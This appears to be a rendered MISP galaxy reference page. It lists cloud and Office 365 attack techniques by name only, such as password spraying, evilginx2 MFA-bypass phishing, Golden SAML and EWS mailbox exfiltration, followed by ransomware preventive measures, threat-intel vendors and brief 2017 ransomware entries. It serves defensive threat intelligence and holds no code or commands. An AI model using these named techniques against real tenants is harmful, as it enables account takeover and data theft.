The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Enumerate domain accounts: OWA & Exchange"

On-Prem Exchange - Enumerate domain accounts: FindPeople

On-Prem Exchange - Enumerate domain accounts: FindPeople

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Enumerate domain accounts: FindPeople"

On-Prem Exchange - OWA version discovery

On-Prem Exchange - OWA version discovery

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - OWA version discovery"

Bruteforce via OWA

Bruteforce via OWA

The tag is: misp-galaxy:cloud-security="Bruteforce via OWA"

Bruteforce EWS

Bruteforce EWS

The tag is: misp-galaxy:cloud-security="Bruteforce EWS"

Bruteforce OAuth

Bruteforce OAuth

The tag is: misp-galaxy:cloud-security="Bruteforce OAuth"

Bruteforce via AAD Sign in Form

Bruteforce via AAD Sign in Form

The tag is: misp-galaxy:cloud-security="Bruteforce via AAD Sign in Form"

Bruteforce through Autologon API

Bruteforce through Autologon API

The tag is: misp-galaxy:cloud-security="Bruteforce through Autologon API"

AAD - Password Spray: MailSniper

AAD - Password Spray: MailSniper

The tag is: misp-galaxy:cloud-security="AAD - Password Spray: MailSniper"

AAD - Password Spray: CredKing

AAD - Password Spray: CredKing

The tag is: misp-galaxy:cloud-security="AAD - Password Spray: CredKing"

O365 - Bruteforce of Autodiscover: SensePost Ruler

O365 - Bruteforce of Autodiscover: SensePost Ruler

The tag is: misp-galaxy:cloud-security="O365 - Bruteforce of Autodiscover: SensePost Ruler"

O365 - Phishing for credentials

O365 - Phishing for credentials

The tag is: misp-galaxy:cloud-security="O365 - Phishing for credentials"

O365 - Phishing using OAuth app

O365 - Phishing using OAuth app

The tag is: misp-galaxy:cloud-security="O365 - Phishing using OAuth app"

O365 - 2FA MITM Phishing: evilginx2

O365 - 2FA MITM Phishing: evilginx2

The tag is: misp-galaxy:cloud-security="O365 - 2FA MITM Phishing: evilginx2"

O365 - MFA Bypass via IMAP/POP

O365 - MFA Bypass via IMAP/POP

The tag is: misp-galaxy:cloud-security="O365 - MFA Bypass via IMAP/POP"

Compromising Pass-Through Authentication

Compromising Pass-Through Authentication

The tag is: misp-galaxy:cloud-security="Compromising Pass-Through Authentication"

Enumerate Users, Admins, Roles and Permissions

Enumerate Users, Admins, Roles and Permissions

The tag is: misp-galaxy:cloud-security="Enumerate Users, Admins, Roles and Permissions"

Enumerate MFA Settings

Enumerate MFA Settings

The tag is: misp-galaxy:cloud-security="Enumerate MFA Settings"

Golden SAML

Golden SAML

The tag is: misp-galaxy:cloud-security="Golden SAML"

On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS

On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS"

On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler

On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler"

Change MFA Settings

Change MFA Settings

The tag is: misp-galaxy:cloud-security="Change MFA Settings"

Change Conditional Access Settings

Change Conditional Access Settings

The tag is: misp-galaxy:cloud-security="Change Conditional Access Settings"

Malicious App Registrations

Malicious App Registrations

The tag is: misp-galaxy:cloud-security="Malicious App Registrations"

Add Service Principal or App Credentials

Add Service Principal or App Credentials

The tag is: misp-galaxy:cloud-security="Add Service Principal or App Credentials"

Add Service Principal

Add Service Principal

The tag is: misp-galaxy:cloud-security="Add Service Principal"

Add Federation Trust

Add Federation Trust

The tag is: misp-galaxy:cloud-security="Add Federation Trust"

O365 - Add Mail forwarding rule

O365 - Add Mail forwarding rule

The tag is: misp-galaxy:cloud-security="O365 - Add Mail forwarding rule"

Add Global admin account

Add Global admin account

The tag is: misp-galaxy:cloud-security="Add Global admin account"

Add user account

Add user account

The tag is: misp-galaxy:cloud-security="Add user account"

O365 - Delegate Tenant Admin

O365 - Delegate Tenant Admin

The tag is: misp-galaxy:cloud-security="O365 - Delegate Tenant Admin"

End Point - Persistence throught Outlook Home Page: SensePost Ruler

End Point - Persistence throught Outlook Home Page: SensePost Ruler

The tag is: misp-galaxy:cloud-security="End Point - Persistence throught Outlook Home Page: SensePost Ruler"

End Point - Persistence throught custom Outlook form

End Point - Persistence throught custom Outlook form

The tag is: misp-galaxy:cloud-security="End Point - Persistence throught custom Outlook form"

Mailbox Rule Creation

Mailbox Rule Creation

The tag is: misp-galaxy:cloud-security="Mailbox Rule Creation"

Mailbox Folder Permissions

Mailbox Folder Permissions

The tag is: misp-galaxy:cloud-security="Mailbox Folder Permissions"

Mail Flow (Transport Rules)

Mail Flow (Transport Rules)

The tag is: misp-galaxy:cloud-security="Mail Flow (Transport Rules)"

O365 - MailSniper: Search Mailbox for credentials

O365 - MailSniper: Search Mailbox for credentials

The tag is: misp-galaxy:cloud-security="O365 - MailSniper: Search Mailbox for credentials"

O365 - Search for Content with eDiscovery

O365 - Search for Content with eDiscovery

The tag is: misp-galaxy:cloud-security="O365 - Search for Content with eDiscovery"

O365 - Account Takeover: Add-MailboxPermission

O365 - Account Takeover: Add-MailboxPermission

The tag is: misp-galaxy:cloud-security="O365 - Account Takeover: Add-MailboxPermission"

O365 - Pivot to On-Prem host: SensePost Ruler

O365 - Pivot to On-Prem host: SensePost Ruler

The tag is: misp-galaxy:cloud-security="O365 - Pivot to On-Prem host: SensePost Ruler"

O365 - Exchange Tasks for C2: MWR

O365 - Exchange Tasks for C2: MWR

The tag is: misp-galaxy:cloud-security="O365 - Exchange Tasks for C2: MWR"

O365 - Send Internal Email

O365 - Send Internal Email

The tag is: misp-galaxy:cloud-security="O365 - Send Internal Email"

On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)

On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)"

On-Prem Exchange - Delegation

On-Prem Exchange - Delegation

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Delegation"

O365 - MailSniper: Search Mailbox for content

O365 - MailSniper: Search Mailbox for content

The tag is: misp-galaxy:cloud-security="O365 - MailSniper: Search Mailbox for content"

O365 - Exfiltration email using EWS APIs with PowerShell

O365 - Exfiltration email using EWS APIs with PowerShell

The tag is: misp-galaxy:cloud-security="O365 - Exfiltration email using EWS APIs with PowerShell"

Downgrade License

Downgrade License

The tag is: misp-galaxy:cloud-security="Downgrade License"

Impersonate Users

Impersonate Users

The tag is: misp-galaxy:cloud-security="Impersonate Users"

Assign Administrative Role to Service Principal

Assign Administrative Role to Service Principal

The tag is: misp-galaxy:cloud-security="Assign Administrative Role to Service Principal"

Elevate to User Access Administrator Role

Elevate to User Access Administrator Role

The tag is: misp-galaxy:cloud-security="Elevate to User Access Administrator Role"

eDiscovery Abuse

eDiscovery Abuse

The tag is: misp-galaxy:cloud-security="eDiscovery Abuse"

O365 - Download documents, messages and email

O365 - Download documents, messages and email

The tag is: misp-galaxy:cloud-security="O365 - Download documents, messages and email"

online-service

Known public online services..

online-service is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MISP Project

Notion

Your wiki, docs, & projects. Together. Notion is the connected workspace where better, faster work happens.

The tag is: misp-galaxy:online-service="Notion"

Notion has relationships with:

  • used-by: misp-galaxy:tool="SNOWYAMBER" with estimative-language:likelihood-probability="likely"

Table 7915. Table References

Links

https://www.notion.so/product

Preventive Measure

Preventive measures based on the ransomware document overview as published in https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml# . The preventive measures are quite generic and can fit any standard Windows infrastructure and their security measures..

Preventive Measure is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

Backup and Restore Process

Make sure to have adequate backup processes on place and frequently test a restore of these backups. (Schrödinger’s backup - it is both existent and non-existent until you’ve tried a restore

The tag is: misp-galaxy:preventive-measure="Backup and Restore Process"

Table 7916. Table References

Links

http://windows.microsoft.com/en-us/windows/back-up-restore-faq#1TC=windows-7.

Block Macros

Disable macros in Office files downloaded from the Internet. This can be configured to work in two different modes: A.) Open downloaded documents in 'Protected View' B.) Open downloaded documents and block all macros

The tag is: misp-galaxy:preventive-measure="Block Macros"

Table 7917. Table References

Links

https://support.office.com/en-us/article/Enable-or-disable-macros-in-Office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6?ui=en-US&rs=en-US&ad=US

https://www.404techsupport.com/2016/04/office2016-macro-group-policy/?utm_source=dlvr.it&utm_medium=twitter

Disable WSH

Disable Windows Script Host

The tag is: misp-galaxy:preventive-measure="Disable WSH"

Table 7918. Table References

Links

http://www.windowsnetworking.com/kbase/WindowsTips/WindowsXP/AdminTips/Customization/DisableWindowsScriptingHostWSH.html

Filter Attachments Level 1

Filter the following attachments on your mail gateway: .ade, .adp, .ani, .bas, .bat, .chm, .cmd, .com, .cpl, .crt, .exe, .hlp, .ht, .hta, .inf, .ins, .isp, .jar, .job, .js, .jse, .lnk, .mda, .mdb, .mde, .mdz, .msc, .msi, .msp, .mst, .ocx, .pcd, .ps1, .reg, .scr, .sct, .shs, .svg, .url, .vb, .vbe, .vbs, .wbk, .wsc, .ws, .wsf, .wsh, .exe, .pif, .pub

The tag is: misp-galaxy:preventive-measure="Filter Attachments Level 1"

Filter Attachments Level 2

Filter the following attachments on your mail gateway: (Filter expression of Level 1 plus) .doc, .xls, .rtf, .docm, .xlsm, .pptm

The tag is: misp-galaxy:preventive-measure="Filter Attachments Level 2"

Restrict program execution

Block all program executions from the %LocalAppData% and %AppData% folder

The tag is: misp-galaxy:preventive-measure="Restrict program execution"

Table 7919. Table References

Links

http://www.fatdex.net/php/2014/06/01/disable-exes-from-running-inside-any-user-appdata-directory-gpo/

http://www.thirdtier.net/ransomware-prevention-kit/

Show File Extensions

Set the registry key "HideFileExt" to 0 in order to show all file extensions, even of known file types. This helps avoiding cloaking tricks that use double extensions. (e.g. "not_a_virus.pdf.exe")

The tag is: misp-galaxy:preventive-measure="Show File Extensions"

Table 7920. Table References

Links

http://www.sevenforums.com/tutorials/10570-file-extensions-hide-show.htm

Enforce UAC Prompt

Enforce administrative users to confirm an action that requires elevated rights

The tag is: misp-galaxy:preventive-measure="Enforce UAC Prompt"

Table 7921. Table References

Links

https://technet.microsoft.com/en-us/library/dd835564(WS.10).aspx

Remove Admin Privileges

Remove and restrict administrative rights whenever possible. Malware can only modify files that users have write access to.

The tag is: misp-galaxy:preventive-measure="Remove Admin Privileges"

Restrict Workstation Communication

Activate the Windows Firewall to restrict workstation to workstation communication

The tag is: misp-galaxy:preventive-measure="Restrict Workstation Communication"

Sandboxing Email Input

Using sandbox that opens email attachments and removes attachments based on behavior analysis

The tag is: misp-galaxy:preventive-measure="Sandboxing Email Input"

Execution Prevention

Software that allows to control the execution of processes - sometimes integrated in Antivirus software Free: AntiHook, ProcessGuard, System Safety Monitor

The tag is: misp-galaxy:preventive-measure="Execution Prevention"

Change Default "Open With" to Notepad

Force extensions primarily used for infections to open up in Notepad rather than Windows Script Host or Internet Explorer

The tag is: misp-galaxy:preventive-measure="Change Default "Open With" to Notepad"

Table 7922. Table References

Links

https://bluesoul.me/2016/05/12/use-gpo-to-change-the-default-behavior-of-potentially-malicious-file-extensions/

File Screening

Server-side file screening with the help of File Server Resource Manager

The tag is: misp-galaxy:preventive-measure="File Screening"

Table 7923. Table References

Links

http://jpelectron.com/sample/Info%20and%20Documents/Stop%20crypto%20badware%20before%20it%20ruins%20your%20day/1-PreventCrypto-Readme.htm

EMET

Detect and block exploitation techniques

The tag is: misp-galaxy:preventive-measure="EMET"

Table 7925. Table References

Links

www.microsoft.com/emet[www.microsoft.com/emet]

http://windowsitpro.com/security/control-emet-group-policy

Sysmon

Detect Ransomware in an early stage with new Sysmon 5 File/Registry monitoring

The tag is: misp-galaxy:preventive-measure="Sysmon"

Table 7926. Table References

Links

https://twitter.com/JohnLaTwC/status/799792296883388416

Blacklist-phone-numbers

Filter the numbers at phone routing level including PABX

The tag is: misp-galaxy:preventive-measure="Blacklist-phone-numbers"

Table 7927. Table References

Links

https://wiki.freepbx.org/display/FPG/Blacklist+Module+User+Guide#BlacklistModuleUserGuide-ImportingorExportingaBlacklistinCSVFileFormat

ACL

Restrict access to shares users should not be allowed to write to

The tag is: misp-galaxy:preventive-measure="ACL"

Table 7928. Table References

Links

https://docs.microsoft.com/en-us/windows/desktop/secauthz/access-control-lists

Packet filtering

Limit access to a service by network/packet filtering the access to

The tag is: misp-galaxy:preventive-measure="Packet filtering"

Table 7929. Table References

Links

https://en.wikipedia.org/wiki/Firewall_(computing)

Producer

List of threat intelligence producer from security vendors to CERTs including any producer of intelligence at large..

Producer is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

Intel471

Intel 471 provides adversary and malware intelligence for leading security teams. Our adversary intelligence is focused on infiltrating access to closed sources where threat actors collaborate, communicate and plan cyber attacks. Our malware intelligence leverages our adversary intelligence and underground capabilities to provide timely data and context on malicious infrastructure.

The tag is: misp-galaxy:producer="Intel471"

Intel471 is also known as:

  • Intel 471 Inc.

  • Intel 471

Table 7930. Table References

Links

https://www.applytosupply.digitalmarketplace.service.gov.uk/g-cloud/services/448869643798857

Sophos

Sophos Ltd. is a British-based security software and hardware company. It was listed on the London Stock Exchange until it was acquired by Thoma Bravo in February 2020

The tag is: misp-galaxy:producer="Sophos"

Sophos is also known as:

  • Sophos LTD

Table 7931. Table References

Links

https://www.sophos.com/en-us/legal

Group-IB

Group-IB is a creator of cybersecurity technologies to investigate, prevent and fight digital crime

The tag is: misp-galaxy:producer="Group-IB"

Table 7932. Table References

Links

https://www.group-ib.com/about-us/

Mandiant

Mandiant is an American cybersecurity firm and a subsidiary of Google.

The tag is: misp-galaxy:producer="Mandiant"

Table 7933. Table References

Links

https://en.wikipedia.org/wiki/Mandiant

Spycloud

Thread intelligence provider focusing on data leaks

The tag is: misp-galaxy:producer="Spycloud"

Domaintools

DomainTools is a leading provider of Whois and other DNS profile data for threat intelligence enrichment.

The tag is: misp-galaxy:producer="Domaintools"

Table 7934. Table References

Links

https://icannwiki.org/DomainTools

Feedly

Feedly is an AI-powered news aggregator application for various web browsers and mobile devices running iOS and Android. It is also available as a cloud-based service.

The tag is: misp-galaxy:producer="Feedly"

Table 7935. Table References

Links

https://en.wikipedia.org/wiki/Feedly

Networksdb.io

Database of public networks, IP addresses and domain names owned by companies and organisations worldwide.

The tag is: misp-galaxy:producer="Networksdb.io"

Table 7936. Table References

Links

https://twitter.com/networksdbio

Censys

Compagny providing comprehensive dataset of internet intelligence

The tag is: misp-galaxy:producer="Censys"

DomainIQ

DomainIQ is an internet research tool providing information about a domain name, its owner, the server it’s hosted on, its ownership history, similar domains and more.

The tag is: misp-galaxy:producer="DomainIQ"

Arctic

Computer and Network Security

The tag is: misp-galaxy:producer="Arctic"

Arctic is also known as:

  • Arctic Security

Bitsight

BitSight is a cybersecurity ratings company that analyzes companies, government agencies, and educational institutions.

The tag is: misp-galaxy:producer="Bitsight"

RiskIQ

RiskIQ, Inc. is a cyber security company that was based in San Francisco, California. It provided cloud-based software as a service (SaaS) for organizations to detect phishing, fraud, malware, and other online security threats. RiskIQ was acquired by Microsoft in July 2021.

The tag is: misp-galaxy:producer="RiskIQ"

Table 7937. Table References

Links

https://en.wikipedia.org/wiki/RiskIQ

Sweepatic

Sweepatic is a cybersecurity company

The tag is: misp-galaxy:producer="Sweepatic"

Team Cymru

Team Cymru is an internet security firm that offers research services making the internet a more secure place.

The tag is: misp-galaxy:producer="Team Cymru"

Ransomware

Ransomware is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

Nhtnwcuf Ransomware (Fake)

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Nhtnwcuf Ransomware (Fake)"

Table 7938. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/nhtnwcuf-ransomware.html

CryptoJacky Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="CryptoJacky Ransomware"

Table 7939. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/cryptojacky-ransomware.html

https://twitter.com/jiriatvirlab/status/838779371750031360

Kaenlupuf Ransomware

About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Kaenlupuf Ransomware"

Table 7940. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/kaenlupuf-ransomware.html

EnjeyCrypter Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="EnjeyCrypter Ransomware"

Table 7941. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/enjey-crypter-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-10th-2017-spora-cerber-and-technical-writeups/

https://www.bleepingcomputer.com/news/security/embittered-enjey-ransomware-developer-launches-ddos-attack-on-id-ransomware/

Dangerous Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Dangerous Ransomware"

Table 7942. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/dangerous-ransomware.html

Vortex Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Vortex Ransomware"

Vortex Ransomware is also known as:

  • Ŧl๏tєгค гคภร๏๓ฬคгє

Table 7943. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/vortex-ransomware.html

https://twitter.com/struppigel/status/839778905091424260

GC47 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="GC47 Ransomware"

Table 7944. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/gc47-ransomware.html

RozaLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="RozaLocker Ransomware"

RozaLocker Ransomware is also known as:

  • Roza

Table 7945. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/rozalocker-ransomware.html

https://twitter.com/jiriatvirlab/status/840863070733885440

CryptoMeister Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="CryptoMeister Ransomware"

Table 7946. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/cryptomeister-ransomware.html

GG Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Poses as Hewlett-Packard 2016

The tag is: misp-galaxy:ransomware="GG Ransomware"

Table 7947. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/gg-ransomware.html

Project34 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Project34 Ransomware"

Table 7948. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/project34-ransomware.html

PetrWrap Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="PetrWrap Ransomware"

Table 7949. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/petrwrap-ransomware.html

https://www.bleepingcomputer.com/news/security/petrwrap-ransomware-is-a-petya-offspring-used-in-targeted-attacks/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/

https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/

Karmen Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. RaaS, baed on HiddenTear

The tag is: misp-galaxy:ransomware="Karmen Ransomware"

Table 7950. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/

https://id-ransomware.blogspot.co.il/2017/03/karmen-ransomware.html

https://twitter.com/malwrhunterteam/status/841747002438361089

Revenge Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoMix / CryptFile2 Variant

The tag is: misp-galaxy:ransomware="Revenge Ransomware"

Table 7951. Table References

Links

https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/

https://id-ransomware.blogspot.co.il/2017/03/revenge-ransomware.html

Turkish FileEncryptor Ransomware

his is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Turkish FileEncryptor Ransomware"

Turkish FileEncryptor Ransomware is also known as:

  • Fake CTB-Locker

Table 7952. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/turkish-fileencryptor.html

https://twitter.com/JakubKroustek/status/842034887397908480

Kirk Ransomware & Spock Decryptor

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Payments in Monero

The tag is: misp-galaxy:ransomware="Kirk Ransomware & Spock Decryptor"

Kirk Ransomware & Spock Decryptor is also known as:

  • Kirk & Spock Decryptor

Table 7953. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/kirkspock-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/

https://www.bleepingcomputer.com/forums/t/642239/kirk-ransomware-help-support-topic-kirk-extension-ransom-notetxt/

http://www.networkworld.com/article/3182415/security/star-trek-themed-kirk-ransomware-has-spock-decryptor-demands-ransom-be-paid-in-monero.html

http://www.securityweek.com/star-trek-themed-kirk-ransomware-emerges

https://www.grahamcluley.com/kirk-ransomware-sports-star-trek-themed-decryptor-little-known-crypto-currency/

https://www.virustotal.com/en/file/39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc/analysis/

ZinoCrypt Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="ZinoCrypt Ransomware"

Table 7954. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/zinocrypt-ransomware.html

https://twitter.com/demonslay335?lang=en

https://twitter.com/malwrhunterteam/status/842781575410597894

Crptxxx Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Uses @enigma0x3’s UAC bypass

The tag is: misp-galaxy:ransomware="Crptxxx Ransomware"

Table 7955. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/crptxxx-ransomware.html

https://www.bleepingcomputer.com/forums/t/609690/ultracrypter-cryptxxx-ultradecrypter-ransomware-help-topic-crypt-cryp1/page-84

http://www.fixinfectedpc.com/uninstall-crptxxx-ransomware-from-pc

https://twitter.com/malwrhunterteam/status/839467168760725508

MOTD Ransomware

About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="MOTD Ransomware"

Table 7956. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/motd-ransomware.html

https://www.bleepingcomputer.com/forums/t/642409/motd-of-ransome-hostage/

https://www.bleepingcomputer.com/forums/t/642409/motd-ransomware-help-support-topics-motdtxt-and-enc-extension/

CryptoDevil Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="CryptoDevil Ransomware"

Table 7957. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/cryptodevil-ransomware.html

https://twitter.com/PolarToffee/status/843527738774507522

FabSysCrypto Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear

The tag is: misp-galaxy:ransomware="FabSysCrypto Ransomware"

Table 7958. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/fabsyscrypto-ransomware.html

https://twitter.com/struppigel/status/837565766073475072

Lock2017 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Lock2017 Ransomware"

Table 7959. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/lock2017-ransomware.html

RedAnts Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="RedAnts Ransomware"

Table 7960. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/redants-ransomware.html

ConsoleApplication1 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="ConsoleApplication1 Ransomware"

Table 7961. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/consoleapplication1-ransomware.html

KRider Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="KRider Ransomware"

Table 7962. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/krider-ransomware.html

https://twitter.com/malwrhunterteam/status/836995570384453632

CYR-Locker Ransomware (FAKE)

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The following note is what you get if you put in the wrong key code: https://3.bp.blogspot.com/-qsS0x-tHx00/WLM3kkKWKAI/AAAAAAAAEDg/Zhy3eYf-ek8fY5uM0yHs7E0fEFg2AXG-gCLcB/s1600/failed-key.jpg

The tag is: misp-galaxy:ransomware="CYR-Locker Ransomware (FAKE)"

Table 7963. Table References

Links

https://id-ransomware.blogspot.co.il/search?updated-min=2017-01-01T00:00:00-08:00&updated-max=2018-01-01T00:00:00-08:00&max-results=50

DotRansomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="DotRansomware"

Table 7964. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/dotransomware.html

Unlock26 Ransomware

